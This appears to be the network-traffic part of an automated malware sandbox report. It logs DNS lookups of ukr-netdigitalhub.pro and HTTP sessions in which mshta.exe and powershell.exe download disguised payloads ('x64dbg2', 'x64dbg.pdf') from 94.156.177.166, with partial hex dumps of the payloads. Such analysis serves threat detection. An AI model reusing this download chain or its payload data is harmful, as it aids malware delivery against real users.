Nov 22, 2024 14:17:46.414309978 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.414876938 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.414890051 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.414933920 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.415749073 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.415790081 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.416637897 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.416651011 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.416665077 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.416683912 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.417418957 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.417432070 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.417474985 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.418101072 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.418142080 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.418421984 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.418926001 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.418970108 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.419754028 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.419765949 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.419780016 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.419806004 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.420574903 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.420624971 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.420978069 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.421536922 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.421581030 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.421725035 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.422226906 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.422267914 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.422354937 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.423032045 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.423080921 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.423969030 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.423979998 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.423990965 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.424012899 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.424850941 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.424863100 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.424896002 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.425556898 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.425618887 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.425781965 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.426305056 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.426317930 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.426361084 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.427122116 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.427162886 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.427278042 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.427922964 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.427970886 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.428044081 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.428766966 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.428812981 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.428988934 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.429559946 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.429572105 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.429610968 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.430372953 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.430419922 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.430840015 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.431227922 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.431237936 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.431266069 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.431989908 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.432033062 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.432219028 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.482867002 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.592202902 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.592570066 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.592587948 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.592628002 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.592641115 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.592731953 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.593075991 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.593415976 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.593462944 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.593977928 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.593997002 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.594043016 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.594435930 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.595118999 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.595139980 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.595166922 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.595174074 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.595221996 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.595732927 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.596051931 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.596194029 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.596376896 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.596396923 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.596435070 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.596982956 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.597527981 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.597573042 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.597963095 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.598506927 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.598567009 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.598644018 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.598664045 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.598701954 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.599438906 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.599697113 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.599740982 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.600272894 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.600557089 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.600599051 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.601078033 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.601758003 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.601804972 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.601943970 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.601977110 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.602020979 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.602694988 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.602828979 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.602870941 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.603554010 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.603668928 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.603713989 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.604336023 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.604672909 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.604779959 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.605252028 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.605467081 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.605518103 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.606039047 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.606060028 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.606102943 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.606795073 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.607453108 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.607497931 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.607594013 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.607614994 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.607666016 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.608639002 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.609409094 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.609431028 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.609462976 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.609474897 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.609615088 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.610085011 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.610908031 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.610929966 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.610953093 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.610963106 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.611017942 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.611887932 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.612229109 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.612278938 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.612528086 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.613434076 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.613455057 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.613483906 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.613493919 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.613523960 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.614154100 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.654748917 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:47.400187016 CET	49750	80	192.168.2.7	94.156.177.166

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 22, 2024 14:17:23.180726051 CET	61822	53	192.168.2.7	1.1.1.1
Nov 22, 2024 14:17:23.327680111 CET	53	61822	1.1.1.1	192.168.2.7
Nov 22, 2024 14:17:45.802963972 CET	52091	53	192.168.2.7	1.1.1.1
Nov 22, 2024 14:18:00.949331045 CET	61049	53	192.168.2.7	1.1.1.1

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 22, 2024 14:17:23.180726051 CET	192.168.2.7	1.1.1.1	0xe4c3	Standard query (0)	ukr-netdigitalhub.pro	A (IP address)	IN (0x0001)	false
Nov 22, 2024 14:17:45.802963972 CET	192.168.2.7	1.1.1.1	0x4cb1	Standard query (0)	x1.i.lencr.org	A (IP address)	IN (0x0001)	false
Nov 22, 2024 14:18:00.949331045 CET	192.168.2.7	1.1.1.1	0xff40	Standard query (0)	x1.i.lencr.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 22, 2024 14:17:23.327680111 CET	1.1.1.1	192.168.2.7	0xe4c3	No error (0)	ukr-netdigitalhub.pro		94.156.177.166	A (IP address)	IN (0x0001)	false
Nov 22, 2024 14:17:33.113507032 CET	1.1.1.1	192.168.2.7	0xf360	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
Nov 22, 2024 14:17:33.113507032 CET	1.1.1.1	192.168.2.7	0xf360	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Nov 22, 2024 14:17:45.952058077 CET	1.1.1.1	192.168.2.7	0x4cb1	No error (0)	x1.i.lencr.org	crl.root-x1.letsencrypt.org.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 22, 2024 14:18:01.185194016 CET	1.1.1.1	192.168.2.7	0xff40	No error (0)	x1.i.lencr.org	crl.root-x1.letsencrypt.org.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 22, 2024 14:18:24.120390892 CET	1.1.1.1	192.168.2.7	0x8de4	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
Nov 22, 2024 14:18:24.120390892 CET	1.1.1.1	192.168.2.7	0x8de4	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Nov 22, 2024 14:18:37.225353956 CET	1.1.1.1	192.168.2.7	0x1e60	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Nov 22, 2024 14:18:37.225353956 CET	1.1.1.1	192.168.2.7	0x1e60	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
Nov 22, 2024 14:19:01.301939964 CET	1.1.1.1	192.168.2.7	0x31b	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
Nov 22, 2024 14:19:01.301939964 CET	1.1.1.1	192.168.2.7	0x31b	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Nov 22, 2024 14:19:25.364037991 CET	1.1.1.1	192.168.2.7	0xe824	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
Nov 22, 2024 14:19:25.364037991 CET	1.1.1.1	192.168.2.7	0xe824	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

ukr-netdigitalhub.pro

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49700	94.156.177.166	80	7812	C:\Windows\System32\mshta.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 14:17:23.523925066 CET	332	OUT	GET /x64dbg2 HTTP/1.1 Accept: / Accept-Language: en-CH UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: ukr-netdigitalhub.pro Connection: Keep-Alive
Nov 22, 2024 14:17:24.961973906 CET	1236	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 13:17:24 GMT Server: Apache/2.4.59 (Debian) Last-Modified: Tue, 19 Nov 2024 13:33:16 GMT ETag: "135be-62744135c1bd4" Accept-Ranges: bytes Content-Length: 79294 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Data Raw: 49 db b8 c5 5a 9c 63 02 1c 84 61 7c b3 50 04 55 d8 e8 54 f3 30 d4 f1 72 d0 98 51 ea 41 da de d0 5f b6 36 e5 e4 38 6d 61 75 b2 f7 4d b5 c7 70 ff 15 4d b8 95 60 b3 c2 75 ea 45 f4 c1 4b 79 c1 42 a6 91 1c fc 19 1f 70 9f 7b f2 7e 7e dc a4 bd 09 28 51 d4 f3 22 49 6f ac f3 c0 fb 9e 44 ab 16 fb f0 b5 a6 24 aa 73 e5 f6 dd 18 19 6e 34 44 99 45 87 eb 99 f9 a5 cd 1f 5c 21 70 09 58 23 d2 5b d0 db 83 8d 26 fd 99 5e b5 6c dd 16 09 2f 01 77 af 27 b5 16 59 11 1c 56 23 96 4a 02 3a 6a 8c d3 0a bc 49 92 b1 b6 72 48 ee 8c e4 8c c7 b7 15 2d 20 f8 59 31 6d bb 02 be bf 2d 6a 90 b3 97 24 4a e0 0a 0b 4c e6 6e c6 f8 b4 6d 28 cd 2d 8f 8e 6b 80 1d e2 41 10 5b 65 4f ba 8a d3 83 4c e2 94 57 67 99 ac bd ab c9 46 b1 31 61 7c 00 92 34 91 2f 9e fe 10 96 b4 e2 3a 84 a5 bb 92 5b 9b 42 ac d2 d8 d1 65 93 e3 d1 bf b7 d6 30 10 af de 65 bc 85 f9 a4 e5 4d d1 fe a2 84 5e 27 17 f0 37 ea 16 ee b5 a9 27 c1 cf fd 4c cd 3e 59 bf 84 d2 8b a6 40 ff 0c 62 f6 5d 5e 00 da 2e e0 35 bb b9 cf 80 ec 19 21 fa 35 3e fa b6 fb 57 18 0e 78 3e 1d b2 d3 81 d7 f1 [TRUNCATED] Data Ascii: IZca\|PUT0rQA_68mauMpM`uEKyBp{~~(Q"IoD$sn4DE\!pX#[&^l/w'YV#J:jIrH- Y1m-j$JLnm(-kA[eOLWgF1a\|4/:[Be0eM^'7'L>Y@b]^.5!5>Wx>VLojpUgEO.b9Udg3jA K fW1op!3@1]. (CyDk@oBS,PGW7$E/%+Qxfim5OF8V9E4w?pJ?iIAx2'D)/eOIPtw5tJ"[n7W}y@lkhh{Ca$CSwQ_Ey$Jv`o9yt"^T:D[qNIfBf_w'{;PCX]Rk~ud!OC:k{yLdk\XWj`1~.:5\|,:0i_Olkg-!\yN'7=UB#Szou\|c_ZI!p^C_i\k??KT0m:^o/sX@lS;3-anI4n[tNEPf_
Nov 22, 2024 14:17:24.962071896 CET	1236	IN	Data Raw: 43 ec 2f b6 36 26 ca 33 3f c5 8f 93 c2 0a e8 9f 93 f8 e5 75 c5 65 82 6c 5a 46 13 43 bf ab 07 9b c2 e2 4d e1 cb 3c 89 ed 7f b9 f5 a9 13 c8 b2 43 5d 39 bc 6e 7a 62 3d dd 69 c2 5c ef 12 86 73 93 bd f4 d0 e0 bd 07 d4 57 6e f7 f5 0c 70 d9 58 91 94 d0 Data Ascii: C/6&3?uelZFCM<C]9nzb=i\sWnpX!`owFaUddl1mi[B$p;Mw8I!s>XYM9gpk^004\|K+akP&o6DnG<m{DoFB{e{\
Nov 22, 2024 14:17:24.962086916 CET	1236	IN	Data Raw: f9 e0 d6 a6 2d 38 4f 6b b9 6a 75 1a 83 85 b8 10 cb 96 e4 42 11 b8 77 8e 53 ca b1 ec b5 73 21 2c 0b fd c2 8e 4b b6 85 b4 7c 72 dd 6a 04 5d 81 3b 7f ff 3e f1 71 41 c6 41 69 47 52 63 87 62 b6 46 49 48 0f 85 c3 2a c5 15 10 2f c5 9e da 0d 8a f6 49 75 Data Ascii: -8OkjuBwSs!,K\|rj];>qAAiGRcbFIH*/Ium406%c"-!NwT9)B{(g\\DNBBM\|OxOF$-5Oxw@F$p@)<z$]7XWS:H:?lZH!gN,J~rkvx3"W>=
Nov 22, 2024 14:17:24.962137938 CET	1236	IN	Data Raw: a9 27 e3 38 6d 65 f3 e5 ca c3 84 2f 8e ae 15 5e 96 94 7e 0b cf 76 9c 63 dd f5 b7 26 d1 c5 63 d2 a5 45 99 c6 5e 57 2e b6 4d 21 10 78 8d 9f a4 d5 a1 6f 80 34 7c a1 0a 33 8b 80 5a 77 ad cc 13 05 5f b1 89 48 14 4e ff 3e 65 c8 be ae 65 23 d5 3e 50 e2 Data Ascii: '8me/^~vc&cE^W.M!xo4\|3Zw_HN>ee#>PbD/V;e:[RoA\h'G0[!B=Y("2`!3=8\KN>Nt^2d/Ab C!yA{"#t\"+`qxe<7Z"kv
Nov 22, 2024 14:17:24.962150097 CET	1236	IN	Data Raw: 4c 96 c3 30 0d 1e 4e 7d 80 01 a8 79 9a 07 95 c0 cb be 8c 8c 76 ee 69 aa 49 49 44 9d d0 91 16 22 65 94 0e ed 16 3b 7d 5e 4c ac 4c 6b 57 a5 15 2e 50 e7 dc e9 cd 78 e0 5e 2d 18 e7 c3 d9 b1 ac ef eb 85 13 06 f9 a7 aa 90 41 2e 40 ca a2 fd 53 a4 33 16 Data Ascii: L0N}yviIID"e;}^LLkW.Px^-A.@S3L,TS\4<L8/Cd;0%RI<E}$g8)6=!l LvB0k;{pVWt+_n#hVc!P\|u(M$i$Ra\|Ndy}Lc6
Nov 22, 2024 14:17:24.962162018 CET	1236	IN	Data Raw: 1b dd 6e be ef 3f 3e dd 5a 6d af 4a 3a 88 b1 9e 4a 9d 2f 11 aa 90 ab ca a2 a9 d9 d8 3c 55 fb 94 79 cf af 7f 43 3c 0d 09 3c 69 f1 79 2c 91 cb 27 38 ab 97 1a 47 cc 6c 8b 32 a4 1b 46 66 66 a0 04 72 1b d1 6a d9 31 5b 0d 90 26 d5 40 9e 31 9e 11 dd b1 Data Ascii: n?>ZmJ:J/<UyC<<iy,'8Gl2Fffrj1[&@1Lc#M aNP ,hF$v)Q\|c@4V,77M]vBY#9xQ,;o~"kJ"vv ]q;+rT,$."yM zzw
Nov 22, 2024 14:17:24.962181091 CET	1236	IN	Data Raw: 5e 99 4e 24 b4 8d e5 1a e6 e3 a4 e4 57 43 4c 1d 5b 9e 3a 5d 7c 6b 68 1c ef 87 22 7b 94 43 99 25 e2 af 96 7b 7d e6 d5 b6 dc e4 9c ed cf 4f 2f 60 47 d3 ea 11 ab e5 89 f2 30 32 34 2d 6b 6a 85 a2 4a 7f 02 a8 ac d0 a0 75 c8 84 81 97 cf 7a 4c 9f 57 c1 Data Ascii: ^N$WCL[:]\|kh"{C%{}O/`G024-kjJuzLW3Xy%KKJr^PMw2uH'd"6IU 99R>R3e;KG(TMBy6fnOM%c0cCz4\|cIZ"V'76975oO+S6r;
Nov 22, 2024 14:17:24.962196112 CET	1236	IN	Data Raw: b0 91 b2 c3 bc 7d c9 a4 8c ee 03 2c 3d 3f 4b 81 ad 52 5e fe d7 7c f1 19 3f 12 b5 7b 22 05 b3 32 af 4a e2 dd 9f b9 6a 68 40 31 6f 37 7f 8e 8f 49 92 03 a9 ff 83 b2 53 33 a0 99 84 aa c7 4d 81 87 3a d0 7d f2 5c 6e e2 f3 e8 f5 be a5 0c ba 99 b0 82 6b Data Ascii: },=?KR^\|?{"2Jjh@1o7IS3M:}\nk[<5#!''\db, 1(T#~"IWaDNv?D8)(3Acy&\;gF\E?..Vg4o^(!;-9J3
Nov 22, 2024 14:17:24.962208033 CET	1236	IN	Data Raw: a5 8d 66 57 2a f7 e0 5f a9 bd 35 3d 4c c7 5a f7 42 76 02 a6 b5 19 5b 57 50 a7 97 0f 10 d3 ed 6d 47 af 40 23 f5 bd 50 1c f7 93 1d 24 0f 51 ab ab 2a f5 a3 f0 23 1d b2 8c 31 0e 06 83 5f d1 4e d6 cf c8 f6 9c 86 36 01 84 26 e6 af 21 fb 37 48 ff fc eb Data Ascii: fW_5=LZBv[WPmG@#P$Q#1_N6&!7H0I*%DGTFZ$<ns3~CY)'3l$EI9nRPpbq3JO`9t@OHZL>W;e2\2M7w8zeihC}
Nov 22, 2024 14:17:24.962220907 CET	1236	IN	Data Raw: 91 a1 8c 16 0a 1d 2c 45 a4 dd 61 67 4a 99 75 61 97 cc 37 c2 6c dc 32 09 63 3b d0 52 49 9d 70 69 cf d9 16 01 d0 3e 9d d7 5d b4 d9 45 52 c5 54 86 c8 e2 f9 6a cd f3 6b b5 6e 82 b3 ce 4d d9 fb 07 6d f7 97 71 83 74 90 59 2e 5f 64 b8 03 ed b6 9d e7 49 Data Ascii: ,EagJua7l2c;RIpi>]ERTjknMmqtY._dIgmaMZ-TQ<mObg[!C_1\oE5/Lu3#opqrjo^,oJqXvP]&c10pKyfFZVx,D@&o7
Nov 22, 2024 14:17:25.081676960 CET	1236	IN	Data Raw: 2c 5a 55 2c 4e 56 2c 6b 4e 2c 78 46 2c 63 4d 2c 55 69 2c 68 4d 2c 53 57 2c 74 76 2c 71 64 2c 55 57 2c 68 4d 2c 41 73 2c 41 73 2c 41 6f 2c 46 4a 2c 7a 77 2c 55 69 2c 68 4d 2c 54 52 2c 78 46 2c 63 4d 2c 55 69 2c 68 4d 2c 58 62 2c 6f 4d 2c 4a 4a 2c Data Ascii: ,ZU,NV,kN,xF,cM,Ui,hM,SW,tv,qd,UW,hM,As,As,Ao,FJ,zw,Ui,hM,TR,xF,cM,Ui,hM,Xb,oM,JJ,hM,UW,hM,qT,Ao,hM,Xb,oM,JJ,hM,Wv,hM,Pi,xF,ZU,GH,QR,BV,eE,yl,mP,TU,Ao,hM,Xb,oM,JJ,rB,rB,NV,hM,kN,xF,cM,Ui,hM,ZU,yn,XS,hM,UW,hM,qd,mP,Ui,qi,eE,yl,GH,FJ,Ui,zw,Fq,xt

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49728	94.156.177.166	80	1836	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 14:17:32.699170113 CET	81	OUT	GET /x64dbg.pdf HTTP/1.1 Host: ukr-netdigitalhub.pro Connection: Keep-Alive
Nov 22, 2024 14:17:34.042202950 CET	1236	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 13:17:33 GMT Server: Apache/2.4.59 (Debian) Last-Modified: Fri, 15 Nov 2024 20:05:30 GMT ETag: "2ba44-626f916c1f3be" Accept-Ranges: bytes Content-Length: 178756 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/pdf Data Raw: 25 50 44 46 2d 31 2e 35 0d 0a 25 b5 b5 b5 b5 0d 0a 31 20 30 20 6f 62 6a 0d 0a 3c 3c 2f 54 79 70 65 2f 43 61 74 61 6c 6f 67 2f 50 61 67 65 73 20 32 20 30 20 52 2f 4c 61 6e 67 28 72 75 2d 52 55 29 20 2f 53 74 72 75 63 74 54 72 65 65 52 6f 6f 74 20 31 30 20 30 20 52 2f 4d 61 72 6b 49 6e 66 6f 3c 3c 2f 4d 61 72 6b 65 64 20 74 72 75 65 3e 3e 3e 3e 0d 0a 65 6e 64 6f 62 6a 0d 0a 32 20 30 20 6f 62 6a 0d 0a 3c 3c 2f 54 79 70 65 2f 50 61 67 65 73 2f 43 6f 75 6e 74 20 31 2f 4b 69 64 73 5b 20 33 20 30 20 52 5d 20 3e 3e 0d 0a 65 6e 64 6f 62 6a 0d 0a 33 20 30 20 6f 62 6a 0d 0a 3c 3c 2f 54 79 70 65 2f 50 61 67 65 2f 50 61 